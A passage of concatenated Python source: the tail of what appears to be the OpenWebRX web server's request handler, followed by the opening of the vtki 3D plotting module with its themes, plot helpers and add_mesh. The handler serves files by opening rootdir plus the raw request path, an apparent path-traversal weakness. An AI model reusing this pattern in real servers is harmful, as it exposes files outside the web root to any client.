id_to_close=get_client_by_id(myclient.id,False)
close_client(id_to_close,False)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "[openwebrx-httpd] client cannot be closed: ",exc_type,exc_value
traceback.print_tb(exc_traceback)
finally:
cmr()
myclient.loopstat=1000
return
elif self.path in ("/status", "/status/"):
#self.send_header('Content-type','text/plain')
getbands=lambda: str(int(cfg.shown_center_freq-cfg.samp_rate/2))+"-"+str(int(cfg.shown_center_freq+cfg.samp_rate/2))
self.wfile.write("status="+("inactive" if receiver_failed else "active")+"\nname="+cfg.receiver_name+"\nsdr_hw="+cfg.receiver_device+"\nop_email="+cfg.receiver_admin+"\nbands="+getbands()+"\nusers="+str(len(clients))+"\nusers_max="+str(cfg.max_clients)+"\navatar_ctime="+avatar_ctime+"\ngps="+str(cfg.receiver_gps)+"\nasl="+str(cfg.receiver_asl)+"\nloc="+cfg.receiver_location+"\nsw_version="+sw_version+"\nantenna="+cfg.receiver_ant+"\n")
print "[openwebrx-httpd] GET /status/ from",self.client_address[0]
else:
f=open(rootdir+self.path)
data=f.read()
extension=self.path[(len(self.path)-4):len(self.path)]
extension=extension[2:] if extension[1]=='.' else extension[1:]
checkresult=check_server()
if extension == "wrx" and (checkresult or receiver_failed):
self.send_302("inactive.html")
return
anyStringsPresentInUserAgent=lambda a: reduce(lambda x,y:x or y, map(lambda b:self.headers['user-agent'].count(b), a), False)
if extension == "wrx" and ( (not anyStringsPresentInUserAgent(("Chrome","Firefox","Googlebot","iPhone","iPad","iPod"))) if 'user-agent' in self.headers.keys() else True ) and (not request_param.count("unsupported")):
self.send_302("upgrade.html")
return
if extension == "wrx":
cleanup_clients(False)
if cfg.max_clients<=len(clients):
self.send_302("retry.html")
return
self.send_response(200)
if(("wrx","html","htm").count(extension)):
self.send_header('Content-type','text/html')
elif(extension=="js"):
self.send_header('Content-type','text/javascript')
elif(extension=="css"):
self.send_header('Content-type','text/css')
self.end_headers()
if extension == "wrx":
replace_dictionary=(
("%[RX_PHOTO_DESC]",cfg.photo_desc),
("%[CLIENT_ID]", generate_client_id(self.client_address[0])) if "%[CLIENT_ID]" in data else "",
("%[WS_URL]","ws://"+cfg.server_hostname+":"+str(cfg.web_port)+"/ws/"),
("%[RX_TITLE]",cfg.receiver_name),
("%[RX_LOC]",cfg.receiver_location),
("%[RX_QRA]",cfg.receiver_qra),
("%[RX_ASL]",str(cfg.receiver_asl)),
("%[RX_GPS]",str(cfg.receiver_gps[0])+","+str(cfg.receiver_gps[1])),
("%[RX_PHOTO_HEIGHT]",str(cfg.photo_height)),("%[RX_PHOTO_TITLE]",cfg.photo_title),
("%[RX_ADMIN]",cfg.receiver_admin),
("%[RX_ANT]",cfg.receiver_ant),
("%[RX_DEVICE]",cfg.receiver_device),
("%[AUDIO_BUFSIZE]",str(cfg.client_audio_buffer_size)),
("%[START_OFFSET_FREQ]",str(cfg.start_freq-cfg.center_freq)),
("%[START_MOD]",cfg.start_mod),
("%[WATERFALL_COLORS]",cfg.waterfall_colors),
("%[WATERFALL_MIN_LEVEL]",str(cfg.waterfall_min_level)),
("%[WATERFALL_MAX_LEVEL]",str(cfg.waterfall_max_level)),
("%[WATERFALL_AUTO_LEVEL_MARGIN]","[%d,%d]"%cfg.waterfall_auto_level_margin),
("%[DIGIMODES_ENABLE]",("true" if cfg.digimodes_enable else "false")),
("%[MATHBOX_WATERFALL_FRES]",str(cfg.mathbox_waterfall_frequency_resolution)),
("%[MATHBOX_WATERFALL_THIST]",str(cfg.mathbox_waterfall_history_length)),
("%[MATHBOX_WATERFALL_COLORS]",cfg.mathbox_waterfall_colors)
)
for rule in replace_dictionary:
while data.find(rule[0])!=-1:
data=data.replace(rule[0],rule[1])
self.wfile.write(data)
f.close()
return
except IOError:
self.send_error(404, 'Invalid path.')
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "[openwebrx-httpd] error (@outside):", exc_type, exc_value
traceback.print_tb(exc_traceback)
class ClientNotFoundException(Exception):
pass
last_worktime=0
last_idletime=0
def get_cpu_usage():
global last_worktime, last_idletime
try:
f=open("/proc/stat","r")
except:
return 0 #Workaround, possibly we're on a Mac
line=""
while not "cpu " in line: line=f.readline()
f.close()
spl=line.split(" ")
worktime=int(spl[2])+int(spl[3])+int(spl[4])
idletime=int(spl[5])
dworktime=(worktime-last_worktime)
didletime=(idletime-last_idletime)
rate=float(dworktime)/(didletime+dworktime)
last_worktime=worktime
last_idletime=idletime
if(last_worktime==0): return 0
return rate
if __name__=="__main__":
main()
|
plotting.py
|
"""
vtki plotting module
"""
import collections
import ctypes
import logging
import os
import time
from threading import Thread
from subprocess import PIPE, Popen
import imageio
import numpy as np
import vtk
from vtk.util import numpy_support as VN
import vtki
from vtki.export import export_plotter_vtkjs
from vtki.utilities import (get_scalar, is_vtki_obj, numpy_to_texture, wrap,
_raise_not_matching)
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters"""
for key, p in _ALL_PLOTTERS.items():
p.close()
_ALL_PLOTTERS.clear()
return True
MAX_N_COLOR_BARS = 10
PV_BACKGROUND = [82/255., 87/255., 110/255.]
FONT_KEYS = {'arial': vtk.VTK_ARIAL,
'courier': vtk.VTK_COURIER,
'times': vtk.VTK_TIMES}
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
rcParams = {
'background' : [0.3, 0.3, 0.3],
'camera' : {
'position' : [1, 1, 1],
'viewup' : [0, 0, 1],
},
'window_size' : [1024, 768],
'font' : {
'family' : 'courier',
'size' : 12,
'title_size': None,
'label_size' : None,
'color' : [1, 1, 1],
'fmt' : None,
},
'cmap' : 'jet',
'color' : 'white',
'nan_color' : 'darkgray',
'outline_color' : 'white',
'colorbar_orientation' : 'horizontal',
'colorbar_horizontal' : {
'width' : 0.60,
'height' : 0.08,
'position_x' : 0.35,
'position_y' : 0.02,
},
'colorbar_vertical' : {
'width' : 0.1,
'height' : 0.8,
'position_x' : 0.85,
'position_y' : 0.1,
},
'show_scalar_bar' : True,
'show_edges' : False,
'lighting' : True,
'interactive' : False,
'render_points_as_spheres' : False,
'use_panel' : True,
}
DEFAULT_THEME = dict(rcParams)
def set_plot_theme(theme):
"""Set the plotting parameters to a predefined theme"""
if theme.lower() in ['paraview', 'pv']:
rcParams['background'] = PV_BACKGROUND
rcParams['cmap'] = 'coolwarm'
rcParams['font']['family'] = 'arial'
rcParams['font']['label_size'] = 16
rcParams['show_edges'] = False
elif theme.lower() in ['document', 'doc', 'paper', 'report']:
rcParams['background'] = 'white'
rcParams['cmap'] = 'viridis'
rcParams['font']['size'] = 18
rcParams['font']['title_size'] = 18
rcParams['font']['label_size'] = 18
rcParams['font']['color'] = 'black'
rcParams['show_edges'] = False
rcParams['color'] = 'tan'
rcParams['outline_color'] = 'black'
elif theme.lower() in ['night', 'dark']:
rcParams['background'] = 'black'
rcParams['cmap'] = 'viridis'
rcParams['font']['color'] = 'white'
rcParams['show_edges'] = False
rcParams['color'] = 'tan'
rcParams['outline_color'] = 'white'
elif theme.lower() in ['default']:
for k,v in DEFAULT_THEME.items():
rcParams[k] = v
def run_from_ipython():
""" returns True when run from IPython """
try:
py = __IPYTHON__
return True
except NameError:
return False
def opacity_transfer_function(key, n_colors):
"""Get the opacity transfer function results: range from 0 to 255
"""
transfer_func = {
'linear': np.linspace(0, 255, n_colors, dtype=np.uint8),
'linear_r': np.linspace(0, 255, n_colors, dtype=np.uint8)[::-1],
'geom': np.geomspace(1e-6, 255, n_colors, dtype=np.uint8),
'geom_r': np.geomspace(255, 1e-6, n_colors, dtype=np.uint8),
}
try:
return transfer_func[key]
except KeyError:
raise KeyError('opactiy transfer function ({}) unknown.'.format(key))
def plot(var_item, off_screen=None, full_screen=False, screenshot=None,
interactive=True, cpos=None, window_size=None,
show_bounds=False, show_axes=True, notebook=None, background=None,
text='', return_img=False, eye_dome_lighting=False, use_panel=None,
**kwargs):
"""
Convenience plotting function for a vtk or numpy object.
Parameters
----------
item : vtk or numpy object
VTK object or numpy array to be plotted.
off_screen : bool
Plots off screen when True. Helpful for saving screenshots
without a window popping up.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores window_size.
Default False.
screenshot : str or bool, optional
Saves screenshot to file when enabled. See:
help(vtkinterface.Plotter.screenshot). Default disabled.
When True, takes screenshot and returns numpy array of image.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
show_bounds : bool, optional
Shows mesh bounds when True. Default False. Alias ``show_grid`` also
accepted.
notebook : bool, optional
When True, the resulting plot is placed inline a jupyter notebook.
Assumes a jupyter console is active.
show_axes : bool, optional
Shows a vtk axes widget. Enabled by default.
text : str, optional
Adds text at the bottom of the plot.
**kwargs : optional keyword arguments
See help(Plotter.add_mesh) for additional options.
Returns
-------
cpos : list
List of camera position, focal point, and view up.
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Returned only when screenshot enabled
"""
if notebook is None:
if run_from_ipython():
try:
notebook = type(get_ipython()).__module__.startswith('ipykernel.')
except NameError:
pass
if notebook:
off_screen = notebook
plotter = Plotter(off_screen=off_screen, notebook=notebook)
if show_axes:
plotter.add_axes()
plotter.set_background(background)
if isinstance(var_item, list):
if len(var_item) == 2: # might be arrows
isarr_0 = isinstance(var_item[0], np.ndarray)
isarr_1 = isinstance(var_item[1], np.ndarray)
if isarr_0 and isarr_1:
plotter.add_arrows(var_item[0], var_item[1])
else:
for item in var_item:
plotter.add_mesh(item, **kwargs)
else:
for item in var_item:
plotter.add_mesh(item, **kwargs)
else:
plotter.add_mesh(var_item, **kwargs)
if text:
plotter.add_text(text)
if show_bounds or kwargs.get('show_grid', False):
if kwargs.get('show_grid', False):
plotter.show_grid()
else:
plotter.show_bounds()
if cpos is None:
cpos = plotter.get_default_cam_pos()
plotter.camera_position = cpos
plotter.camera_set = False
else:
plotter.camera_position = cpos
if eye_dome_lighting:
plotter.enable_eye_dome_lighting()
result = plotter.show(window_size=window_size,
auto_close=False,
interactive=interactive,
full_screen=full_screen,
screenshot=screenshot,
return_img=return_img,
use_panel=use_panel)
# close and return camera position and maybe image
plotter.close()
# Result will be handled by plotter.show(): cpos or [cpos, img]
return result
def plot_arrows(cent, direction, **kwargs):
"""
Plots arrows as vectors
Parameters
----------
cent : np.ndarray
Accepts a single 3d point or array of 3d points.
directions : np.ndarray
Accepts a single 3d point or array of 3d vectors.
Must contain the same number of items as cent.
**kwargs : additional arguments, optional
See help(vtki.Plot)
Returns
-------
Same as Plot. See help(vtki.Plot)
"""
return plot([cent, direction], **kwargs)
def running_xserver():
"""
Check if x server is running
Returns
-------
running_xserver : bool
True when on Linux and running an xserver. Returns None when
on a non-linux platform.
"""
try:
p = Popen(["xset", "-q"], stdout=PIPE, stderr=PIPE)
p.communicate()
return p.returncode == 0
except:
return False
class BasePlotter(object):
"""
To be used by the Plotter and QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
border_width : float, optional
Width of the border in pixels when enabled.
"""
def __new__(cls, *args, **kwargs):
if cls is BasePlotter:
raise TypeError("vtki.BasePlotter is an abstract class and may not be instantiated.")
return object.__new__(cls)
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=1.0):
""" Initialize base plotter """
self.image_transparent_background = False
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self.renderers = []
self._active_renderer_index = 0
assert_str = '"shape" should be a list or tuple'
assert isinstance(shape, collections.Iterable), assert_str
assert shape[0] > 0, '"shape" must be positive'
assert shape[1] > 0, '"shape" must be positive'
self.shape = shape
for i in reversed(range(shape[0])):
for j in range(shape[1]):
renderer = vtki.Renderer(self, border, border_color, border_width)
x0 = i/shape[0]
y0 = j/shape[1]
x1 = (i+1)/shape[0]
y1 = (j+1)/shape[1]
renderer.SetViewport(y0, x0, y1, x1)
self.renderers.append(renderer)
# This is a private variable to keep track of how many colorbars exist
# This allows us to keep adding colorbars without overlapping
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
# This keeps track of scalar names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
self._actors = {}
# track if the camera has been setup
# self.camera_set = False
self.first_time = True
# Keep track of the scale
self._labels = []
# Add self to open plotters
_ALL_PLOTTERS[str(hex(id(self)))] = self
# lighting style
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
def update_style(self):
if not hasattr(self, '_style'):
self._style = vtk.vtkInteractorStyleTrackballCamera()
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style)
def enable_trackball_style(self):
""" sets the interactive style to trackball - the default syle """
self._style = vtk.vtkInteractorStyleTrackballCamera()
return self.update_style()
def enable_image_style(self):
""" sets the interactive style to image
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = vtk.vtkInteractorStyleImage()
return self.update_style()
def enable_joystick_style(self):
""" sets the interactive style to joystick
allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse if not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = vtk.vtkInteractorStyleJoystickCamera()
return self.update_style()
def enable_zoom_style(self):
""" sets the interactive style to rubber band zoom
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = vtk.vtkInteractorStyleRubberBandZoom()
return self.update_style()
def enable_terrain_style(self):
""" sets the interactive style to terrain
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = vtk.vtkInteractorStyleTerrain()
return self.update_style()
def enable_rubber_band_style(self):
""" sets the interactive style to rubber band picking
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = vtk.vtkInteractorStyleRubberBandPick()
return self.update_style()
def set_focus(self, point):
""" sets focus to a point """
if isinstance(point, np.ndarray):
if point.ndim != 1:
point = point.ravel()
self.camera.SetFocalPoint(point)
self._render()
def set_position(self, point):
""" sets camera position to a point """
if isinstance(point, np.ndarray):
if point.ndim != 1:
point = point.ravel()
self.camera.SetPosition(point)
self._render()
def set_viewup(self, vector):
""" sets camera viewup vector """
if isinstance(vector, np.ndarray):
if vector.ndim != 1:
vector = vector.ravel()
self.camera.SetViewUp(vector)
self._render()
def _render(self):
""" redraws render window if the render window exists """
if hasattr(self, 'ren_win'):
if hasattr(self, 'render_trigger'):
self.render_trigger.emit()
elif not self.first_time:
self.render()
def add_axes(self, interactive=None, color=None):
""" Add an interactive axes widget """
if interactive is None:
interactive = rcParams['interactive']
if hasattr(self, 'axes_widget'):
self.axes_widget.SetInteractive(interactive)
self._update_axes_color(color)
return
self.axes_actor = vtk.vtkAxesActor()
self.axes_widget = vtk.vtkOrientationMarkerWidget()
self.axes_widget.SetOrientationMarker(self.axes_actor)
if hasattr(self, 'iren'):
self.axes_widget.SetInteractor(self.iren)
self.axes_widget.SetEnabled(1)
self.axes_widget.SetInteractive(interactive)
# Set the color
self._update_axes_color(color)
def hide_axes(self):
"""Hide the axes orientation widget"""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOff()
def show_axes(self):
"""Show the axes orientation widget"""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOn()
else:
self.add_axes()
def key_press_event(self, obj, event):
""" Listens for key press event """
key = self.iren.GetKeySym()
log.debug('Key %s pressed' % key)
if key == 'q':
self.q_pressed = True
elif key == 'b':
self.observer = self.iren.AddObserver('LeftButtonPressEvent',
self.left_button_down)
elif key == 'v':
self.isometric_view_interactive()
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click"""
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def isometric_view_interactive(self):
""" sets the current interactive render window to isometric view """
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""
Update window, redraw, process messages query
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call vtkRenderWindowInteractor.Render() immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self._render()
Plotter.last_update_time = curr_time
else:
if force_redraw:
self.iren.Render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
rng=None, stitle=None, show_edges=None,
point_size=5.0, opacity=1.0, line_width=None,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=False, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None,
multi_colors=False, name=None, texture=None,
render_points_as_spheres=None,
render_lines_as_tubes=False, edge_color='black',
ambient=0.0, show_scalar_bar=None, nan_color=None,
nan_opacity=1.0, loc=None, backface_culling=False,
rgb=False, **kwargs):
"""
Adds a unstructured, structured, or surface mesh to the
plotting object.
Also accepts a 3D numpy.ndarray
Parameters
----------
mesh : vtk unstructured, structured, polymesh, or 3D numpy.ndarray
A vtk unstructured, structured, or polymesh to plot.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
Color will be overridden when scalars are input.
style : string, optional
Visualization style of the vtk mesh. One for the following:
style='surface'
style='wireframe'
style='points'
Defaults to 'surface'
scalars : numpy array, optional
Scalars used to "color" the mesh. Accepts an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
color and scalars are None, then the active scalars are
used
rng : 2 item list, optional
Range of mapper for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``clim``
is also an accepted alias for this.
stitle : string, optional
Scalar title. By default there is no scalar legend bar.
Setting this creates the legend bar and adds a title to
it. To create a bar with no title, use an empty string
(i.e. '').
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
point_size : float, optional
Point size. Applicable when style='points'. Default 5.0
opacity : float, optional
Opacity of mesh. Should be between 0 and 1. Default 1.0.
A string option can also be specified to map the scalar range
to the opacity. Options are: linear, linear_r, geom, geom_r
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
flip_scalars : bool, optional
Flip direction of cmap.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Default
256.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalar display. Default
False
cmap : str, optional
cmap string. See available matplotlib cmaps. Only
applicable for when displaying scalars. Defaults None
(rainbow). Requires matplotlib.
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first avaialble texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.2.
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all NaN values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of NaN values. Should be between 0 and 1.
Default 1.0
backface_culling : bool optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
rgb : bool, optional
If an 2 dimensional array is passed as the scalars, plot those
values as RGB+A colors! ``rgba`` is also accepted alias for this.
Returns
-------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
# fixes lighting issue when using precalculated normals
if isinstance(mesh, vtk.vtkPolyData):
if mesh.GetPointData().HasArray('Normals'):
mesh.point_arrays['Normals'] = mesh.point_arrays.pop('Normals')
if scalar_bar_args is None:
scalar_bar_args = {}
if isinstance(mesh, np.ndarray):
mesh = vtki.PolyData(mesh)
style = 'points'
# Convert the VTK data object to a vtki wrapped object if neccessary
if not is_vtki_obj(mesh):
mesh = wrap(mesh)
if show_edges is None:
show_edges = rcParams['show_edges']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
if rng is None:
rng = kwargs.get('clim', None)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = '{}({})'.format(type(mesh).__name__, str(hex(id(mesh))))
if isinstance(mesh, vtki.MultiBlock):
self.remove_actor(name, reset_camera=reset_camera)
# frist check the scalars
if rng is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalar specified
if isinstance(scalars, str):
rng = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise RuntimeError('Scalar array must be given as a string name for multiblock datasets.')
if multi_colors:
# Compute unique colors for each index of the block
import matplotlib as mpl
from itertools import cycle
cycler = mpl.rcParams['axes.prop_cycle']
colors = cycle(cycler)
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
if not is_vtki_obj(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_vtki_obj(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None:
# Note that a block can exist but be None type
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_scalar(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
a = self.add_mesh(data, color=color, style=style,
scalars=ts, rng=rng, stitle=stitle,
show_edges=show_edges,
point_size=point_size, opacity=opacity,
line_width=line_width,
flip_scalars=flip_scalars,
lighting=lighting, n_colors=n_colors,
interpolate_before_map=interpolate_before_map,
cmap=cmap, label=label,
scalar_bar_args=scalar_bar_args,
reset_camera=reset_camera, name=next_name,
texture=None,
render_points_as_spheres=render_points_as_spheres,
render_lines_as_tubes=render_lines_as_tubes,
edge_color=edge_color,
show_scalar_bar=show_scalar_bar, nan_color=nan_color,
nan_opacity=nan_opacity,
loc=loc, rgb=rgb, **kwargs)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
if nan_color is None:
nan_color = rcParams['nan_color']
nanr, nanb, nang = parse_color(nan_color)
nan_color = nanr, nanb, nang, nan_opacity
if color is True:
color = rcParams['color']
if mesh.n_points < 1:
raise RuntimeError('Empty meshes cannot be plotted. Input mesh has zero points.')
# set main values
self.mesh = mesh
self.mapper = vtk.vtkDataSetMapper()
self.mapper.SetInputData(self.mesh)
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, loc=loc, culling=backface_culling)
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalar components are not vectors/tuples
scalars = mesh.active_scalar
if scalars is None:# or scalars.ndim != 1:
scalars = None
else:
if stitle is None:
stitle = mesh.active_scalar_info[1]
if texture == True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError('Invalid texture type ({})'.format(type(texture)))
if mesh.GetPointData().GetTCoords() is None:
raise AssertionError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Scalar formatting ===================================================
if cmap is None:
cmap = kwargs.get('colormap', None)
if cmap is None:
cmap = rcParams['cmap']
title = 'Data' if stitle is None else stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
append_scalars = True
if isinstance(scalars, str):
title = scalars
scalars = get_scalar(mesh, scalars,
preference=kwargs.get('preference', 'cell'), err=True)
if stitle is None:
stitle = title
#append_scalars = False
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if rgb is False or rgb is None:
rgb = kwargs.get('rgba', False)
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = '{}-normed'.format(title)
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool:
scalars = scalars.astype(np.float)
# Scalar interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_scalar(scalars, title, append_scalars)
self.mapper.SetScalarModeToUsePointData()
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_scalar(scalars, title, append_scalars)
self.mapper.SetScalarModeToUseCellData()
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
else:
_raise_not_matching(scalars, mesh)
# Set scalar range
if rng is None:
rng = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(rng, float) or isinstance(rng, int):
rng = [-rng, rng]
if np.any(rng) and not rgb:
self.mapper.SetScalarRange(rng[0], rng[1])
# Flip if requested
table = self.mapper.GetLookupTable()
table.SetNanColor(nan_color)
if cmap is not None:
try:
from matplotlib.cm import get_cmap
except ImportError:
raise Exception('cmap requires matplotlib')
if isinstance(cmap, str):
cmap = get_cmap(cmap)
# ELSE: assume cmap is callable
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opactities
if isinstance(opacity, str):
ctable[:,-1] = opacity_transfer_function(opacity, n_colors)
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise Exception('Invalid style. Must be one of the following:\n' +
'\t"surface"\n' +
'\t"wireframe"\n' +
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
geom = single_triangle()
if scalars is not None:
geom = vtki.Box()
rgb_color = parse_color('black')
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and not rgb:
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
2 item list
